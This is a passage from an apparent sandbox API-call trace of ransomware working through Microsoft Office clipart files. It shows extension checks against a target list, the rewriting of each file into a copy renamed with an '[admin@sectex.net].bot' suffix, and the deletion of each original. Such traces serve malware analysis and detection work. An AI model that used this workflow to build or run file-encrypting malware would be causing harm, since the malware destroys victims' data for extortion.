	[0169.276] lstrlenW (lpString=".1cd") returned 4
	[0169.276] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 63
	[0169.277] lstrlenW (lpString=".jpg") returned 4
	[0169.277] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.277] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.277] lstrlenW (lpString="J0152894.WMF") returned 12
	[0169.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.277] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=11348) returned 1
	[0169.277] CloseHandle (hObject=0x1d8) returned 1
	[0169.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf")) returned 0x20
	[0169.278] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.278] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.278] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.279] GetLastError () returned 0x0
	[0169.279] ReadFile (in: hFile=0x1d8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2c54, lpOverlapped=0x0) returned 1
	[0169.288] WriteFile (in: hFile=0x118, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x2c60, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x2c60, lpOverlapped=0x0) returned 1
	[0169.289] ReadFile (in: hFile=0x1d8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.289] WriteFile (in: hFile=0x118, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.289] SetEndOfFile (hFile=0x118) returned 1
	[0169.289] CloseHandle (hObject=0x118) returned 1
	[0169.289] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.289] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.299] CloseHandle (hObject=0x1d8) returned 1
	[0169.299] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.299] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152894.wmf")) returned 1
	[0169.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63
	[0169.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63
	[0169.300] lstrlenW (lpString=".doc") returned 4
	[0169.300] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.300] lstrlenW (lpString=".docx") returned 5
	[0169.300] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0169.300] lstrlenW (lpString=".pdf") returned 4
	[0169.300] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.300] lstrlenW (lpString=".xls") returned 4
	[0169.300] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.300] lstrlenW (lpString=".xlsx") returned 5
	[0169.300] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0169.300] lstrlenW (lpString=".ppt") returned 4
	[0169.300] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63
	[0169.300] lstrlenW (lpString=".zip") returned 4
	[0169.300] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.300] lstrlenW (lpString=".rar") returned 4
	[0169.300] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.300] lstrlenW (lpString=".bz2") returned 4
	[0169.300] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.300] lstrlenW (lpString=".7z") returned 3
	[0169.301] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63
	[0169.301] lstrlenW (lpString=".dbf") returned 4
	[0169.301] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63
	[0169.301] lstrlenW (lpString=".1cd") returned 4
	[0169.301] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63
	[0169.301] lstrlenW (lpString=".jpg") returned 4
	[0169.301] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63
	[0169.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63
	[0169.301] lstrlenW (lpString=".doc") returned 4
	[0169.301] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.301] lstrlenW (lpString=".docx") returned 5
	[0169.301] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0169.301] lstrlenW (lpString=".pdf") returned 4
	[0169.301] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.301] lstrlenW (lpString=".xls") returned 4
	[0169.301] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.301] lstrlenW (lpString=".xlsx") returned 5
	[0169.301] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0169.301] lstrlenW (lpString=".ppt") returned 4
	[0169.301] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63
	[0169.301] lstrlenW (lpString=".zip") returned 4
	[0169.301] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.301] lstrlenW (lpString=".rar") returned 4
	[0169.301] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.301] lstrlenW (lpString=".bz2") returned 4
	[0169.301] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.301] lstrlenW (lpString=".7z") returned 3
	[0169.301] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63
	[0169.302] lstrlenW (lpString=".dbf") returned 4
	[0169.302] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63
	[0169.302] lstrlenW (lpString=".1cd") returned 4
	[0169.302] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 63
	[0169.302] lstrlenW (lpString=".jpg") returned 4
	[0169.302] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.302] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.302] lstrlenW (lpString="J0153047.WMF") returned 12
	[0169.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.315] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=33068) returned 1
	[0169.315] CloseHandle (hObject=0x1d8) returned 1
	[0169.315] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf")) returned 0x20
	[0169.315] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.315] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.315] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.316] GetLastError () returned 0x0
	[0169.316] ReadFile (in: hFile=0x1d8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x812c, lpOverlapped=0x0) returned 1
	[0169.349] WriteFile (in: hFile=0x118, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x8130, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x8130, lpOverlapped=0x0) returned 1
	[0169.350] ReadFile (in: hFile=0x1d8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.350] WriteFile (in: hFile=0x118, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.350] SetEndOfFile (hFile=0x118) returned 1
	[0169.350] CloseHandle (hObject=0x118) returned 1
	[0169.350] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.350] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.353] CloseHandle (hObject=0x1d8) returned 1
	[0169.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.368] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153047.wmf")) returned 1
	[0169.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63
	[0169.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63
	[0169.369] lstrlenW (lpString=".doc") returned 4
	[0169.369] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.369] lstrlenW (lpString=".docx") returned 5
	[0169.369] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.369] lstrlenW (lpString=".pdf") returned 4
	[0169.369] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.369] lstrlenW (lpString=".xls") returned 4
	[0169.369] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.369] lstrlenW (lpString=".xlsx") returned 5
	[0169.369] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.369] lstrlenW (lpString=".ppt") returned 4
	[0169.369] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63
	[0169.369] lstrlenW (lpString=".zip") returned 4
	[0169.369] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.369] lstrlenW (lpString=".rar") returned 4
	[0169.369] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.369] lstrlenW (lpString=".bz2") returned 4
	[0169.369] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.369] lstrlenW (lpString=".7z") returned 3
	[0169.369] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63
	[0169.369] lstrlenW (lpString=".dbf") returned 4
	[0169.369] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63
	[0169.370] lstrlenW (lpString=".1cd") returned 4
	[0169.370] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63
	[0169.370] lstrlenW (lpString=".jpg") returned 4
	[0169.370] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63
	[0169.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63
	[0169.370] lstrlenW (lpString=".doc") returned 4
	[0169.370] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.370] lstrlenW (lpString=".docx") returned 5
	[0169.370] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.370] lstrlenW (lpString=".pdf") returned 4
	[0169.370] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.370] lstrlenW (lpString=".xls") returned 4
	[0169.370] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.370] lstrlenW (lpString=".xlsx") returned 5
	[0169.370] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.370] lstrlenW (lpString=".ppt") returned 4
	[0169.370] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63
	[0169.370] lstrlenW (lpString=".zip") returned 4
	[0169.370] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.370] lstrlenW (lpString=".rar") returned 4
	[0169.370] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.370] lstrlenW (lpString=".bz2") returned 4
	[0169.370] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.370] lstrlenW (lpString=".7z") returned 3
	[0169.370] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63
	[0169.370] lstrlenW (lpString=".dbf") returned 4
	[0169.370] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63
	[0169.370] lstrlenW (lpString=".1cd") returned 4
	[0169.371] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 63
	[0169.371] lstrlenW (lpString=".jpg") returned 4
	[0169.371] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.371] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.371] lstrlenW (lpString="J0153095.WMF") returned 12
	[0169.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153095.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.380] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=3704) returned 1
	[0169.380] CloseHandle (hObject=0x118) returned 1
	[0169.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153095.wmf")) returned 0x20
	[0169.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153095.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153095.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.380] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.380] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153095.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0169.381] GetLastError () returned 0x0
	[0169.381] ReadFile (in: hFile=0x118, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xe78, lpOverlapped=0x0) returned 1
	[0169.404] WriteFile (in: hFile=0x354, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xe80, lpOverlapped=0x0) returned 1
	[0169.405] ReadFile (in: hFile=0x118, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.405] WriteFile (in: hFile=0x354, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.405] SetEndOfFile (hFile=0x354) returned 1
	[0169.406] CloseHandle (hObject=0x354) returned 1
	[0169.406] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.406] SetEndOfFile (hFile=0x118) returned 1
	[0169.408] CloseHandle (hObject=0x118) returned 1
	[0169.408] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.408] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153095.wmf")) returned 1
	[0169.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 63
	[0169.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 63
	[0169.569] lstrlenW (lpString=".doc") returned 4
	[0169.569] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.569] lstrlenW (lpString=".docx") returned 5
	[0169.569] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0169.569] lstrlenW (lpString=".pdf") returned 4
	[0169.569] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.569] lstrlenW (lpString=".xls") returned 4
	[0169.569] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.569] lstrlenW (lpString=".xlsx") returned 5
	[0169.569] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0169.569] lstrlenW (lpString=".ppt") returned 4
	[0169.569] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 63
	[0169.569] lstrlenW (lpString=".zip") returned 4
	[0169.569] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.569] lstrlenW (lpString=".rar") returned 4
	[0169.569] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.569] lstrlenW (lpString=".bz2") returned 4
	[0169.569] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.569] lstrlenW (lpString=".7z") returned 3
	[0169.569] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 63
	[0169.569] lstrlenW (lpString=".dbf") returned 4
	[0169.569] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 63
	[0169.570] lstrlenW (lpString=".1cd") returned 4
	[0169.570] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 63
	[0169.570] lstrlenW (lpString=".jpg") returned 4
	[0169.570] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 63
	[0169.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 63
	[0169.570] lstrlenW (lpString=".doc") returned 4
	[0169.570] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.570] lstrlenW (lpString=".docx") returned 5
	[0169.570] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0169.570] lstrlenW (lpString=".pdf") returned 4
	[0169.570] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.570] lstrlenW (lpString=".xls") returned 4
	[0169.570] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.570] lstrlenW (lpString=".xlsx") returned 5
	[0169.570] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0169.570] lstrlenW (lpString=".ppt") returned 4
	[0169.570] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 63
	[0169.570] lstrlenW (lpString=".zip") returned 4
	[0169.570] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.570] lstrlenW (lpString=".rar") returned 4
	[0169.570] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.570] lstrlenW (lpString=".bz2") returned 4
	[0169.570] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.570] lstrlenW (lpString=".7z") returned 3
	[0169.570] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 63
	[0169.570] lstrlenW (lpString=".dbf") returned 4
	[0169.570] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 63
	[0169.570] lstrlenW (lpString=".1cd") returned 4
	[0169.570] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 63
	[0169.571] lstrlenW (lpString=".jpg") returned 4
	[0169.571] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.571] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
